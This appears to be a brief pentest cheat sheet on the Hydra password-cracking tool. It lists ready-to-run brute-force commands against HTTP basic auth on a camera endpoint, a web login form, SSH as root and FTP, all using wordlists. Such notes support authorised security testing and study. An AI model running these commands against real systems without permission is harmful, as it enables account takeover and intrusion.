Hydra
- Tool to crack passwords of various web service and also system services/protocols such as SSH and FTP.
- Usage:
- hydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /get_camera_params.cgi [basic auth bruteforce]
- hydra -l username -P wordlist.txt VICTIMIP http-post-form "/URLPATH:username=^USER^\&password=^PASS^:login error" -V
- hydra -l root -P wordlist.txt -t 6 ssh://ip
- hydra -l user -P wordlist.txt ftp://ip
- Reference: